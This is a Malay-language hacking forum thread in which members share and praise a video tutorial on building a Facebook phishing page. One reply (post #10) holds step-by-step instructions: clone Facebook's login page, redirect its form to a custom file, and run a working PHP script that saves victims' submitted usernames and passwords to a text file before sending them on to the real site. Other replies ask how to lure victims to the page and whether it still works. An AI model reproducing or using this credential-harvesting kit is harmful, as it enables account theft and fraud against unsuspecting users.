Welcome to TBD.my, Guest! Log In or Sign Up
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
cara-cara nak buat facebook phishing noob habis
27-08-2010, 10:56 AM (This post was last modified: 27-08-2010 01:10 PM by Kiraich1.)
Post: #1
Video cara-cara nak buat facebook phishing noob habis
2nd video aku capture sndri, aku sangat2 noob weh,

1] Sorry my pecah english
2] Sorry my miskin grammer
3] mmg video ni agak lame sebab aku sgt2 noob wohh. T__T

available in HD. =)

http://www.youtube.com/watch?v=eF7MnrxXxlI

Download (27MB)

Mediafire
http://www.mediafire.com/?lbdp0nlac29ang7

Hotfile
http://hotfile.com/dl/64976379/4ada0a3/c...s.mp4.html

seriously, i am noob.
Quote
27-08-2010, 01:10 PM
Post: #2
RE: cara-cara nak buat facebook phishing noob habis
link untuk download available now, =)

seriously, i am noob.
Quote
27-08-2010, 03:43 PM
Post: #3
RE: cara-cara nak buat facebook phishing noob habis
gud info walau agak ckit lame..biasalaa..tp utk permulaan..mmg bagus..
teruskan mengepost tut2 sebegini..Smile

Patuhi peraturan berforum

Balasan mereka yg ingkar peraturan tbd.my Facepalm
Spoiler:
Quote
27-08-2010, 04:09 PM
Post: #4
RE: cara-cara nak buat facebook phishing noob habis
(27-08-2010 03:43 PM)sil Wrote:  gud info walau agak ckit lame..biasalaa..tp utk permulaan..mmg bagus..
teruskan mengepost tut2 sebegini..Smile

thx for watching ea, hehe, biasa lah, i am noob, baru nak kenal2 benda2 cenggini, GayFaceGayFaceGayFaceGayFace

seriously, i am noob.
Quote
27-08-2010, 05:00 PM
Post: #5
RE: cara-cara nak buat facebook phishing noob habis
sharing is caring. itu lebeyy penting. GayFace +1 for your effort.


  ▲
▲ ▲
Spoiler:

surah Al-Imran Ayat 31

Quote
27-08-2010, 05:08 PM
Post: #6
RE: cara-cara nak buat facebook phishing noob habis
(27-08-2010 05:00 PM)ak47suk1 Wrote:  sharing is caring. itu lebeyy penting. GayFace +1 for your effort.

thanks akatsuki, =)

seriously, i am noob.
Quote
24-06-2011, 03:42 AM
Post: #7
RE: cara-cara nak buat facebook phishing noob habis
Salam nak tanya tuan tanah...code untuk login.php tu tak berapa jelas la..leh upload tak? TQ..sorry susahkan tuan tanah
Quote
25-06-2011, 09:11 AM
Post: #8
RE: cara-cara nak buat facebook phishing noob habis
gud info.. tp satu je yg xde.. care2 utk redirectkan FB org ke phishing site kite.. ambe ade bace dlu, tp dh lupe...

(sorry if i'm wrong, i'm a noob too.. hehe)
Quote
25-06-2011, 10:17 AM (This post was last modified: 25-06-2011 10:23 AM by reznet.)
Post: #9
RE: cara-cara nak buat facebook phishing noob habis
mak ai., haluih, beno..yang die tulis kt note pad tu
-----
sekali bunkface da - Bunk Anthem
-------
ko recode gune sopware ape?..awat die jd vid HD...leh shared x sopware tuh

PHP Code:
Get a Free Hosting Domain at " http://tny.cz/bcc10d6c " 
Quote
25-06-2011, 12:15 PM
Post: #10
RE: cara-cara nak buat facebook phishing noob habis
(25-06-2011 09:11 AM)akuks Wrote:  gud info.. tp satu je yg xde.. care2 utk redirectkan FB org ke phishing site kite.. ambe ade bace dlu, tp dh lupe...

(sorry if i'm wrong, i'm a noob too.. hehe)

Today we are going to make a phisher for facebook.

1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change "post" to "get"
Cool save the file, name it: index.php and save it to desktop but remember! where it says: "save as type" change it to "all files" this is very important
9) make a new file in notepad, and put this code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10) now save it as lol.php and remember the save as file type to all files.

11) now, make a new file in notepad, dont write anything, save it as: passwords.txt


kalo ade salah mane2 tlg tegur atau boleh di upgradekan lag =)[/quote]

Saya Kene Hack Oleh Budak MMU (Hebat abang mmu ni..Ajar boleh x ) GayFace
Quote
25-06-2011, 12:44 PM
Post: #11
RE: cara-cara nak buat facebook phishing noob habis
(25-06-2011 10:17 AM)reznet Wrote:  mak ai., haluih, beno..yang die tulis kt note pad tu
-----
sekali bunkface da - Bunk Anthem
-------
ko recode gune sopware ape?..awat die jd vid HD...leh shared x sopware tuh

handycam pro.. video bergiga2.. GayFace

-|ninja33|-
[Image: b_560_95_1.png]
Quote
07-09-2011, 11:33 AM
Post: #12
RE: cara-cara nak buat facebook phishing noob habis
bole gune lagi ke mende ni? Big Grin
Quote


Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  belajar cara-cara soldering yg betul farrell 6 1,707 09-08-2012 07:45 PM
Last Post: XdeathX
  Video Cara Nak Repair Laptop ninja 9 3,247 10-12-2011 02:40 AM
Last Post: zilog
Video cara-cara nak remote exploit Windows XP SP2 noob habis Kiraich1 13 3,035 28-09-2011 09:57 PM
Last Post: reznet
  [Video] Bagaimana Nak Phishing*Eng* sif3693 0 520 21-06-2011 06:54 PM
Last Post: sif3693

Forum Jump:


User(s) browsing this thread: 1 Guest(s)